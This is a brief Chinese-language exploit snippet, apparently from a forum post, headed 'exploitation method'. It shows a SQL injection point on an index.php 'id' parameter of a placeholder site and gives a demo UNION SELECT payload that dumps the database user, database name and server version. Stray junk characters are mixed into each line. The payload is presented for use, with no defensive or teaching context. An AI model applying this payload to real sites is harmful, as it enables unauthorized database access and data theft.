利用方法:
) ?& X4 y' c0 O! b G http://www.xxx.com/index.php?id=[SQL]
- v; b+ |) j) |0 J* S4 f( J Demo:
, S* i J( Z! A. q) B3 o6 V7 Q http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |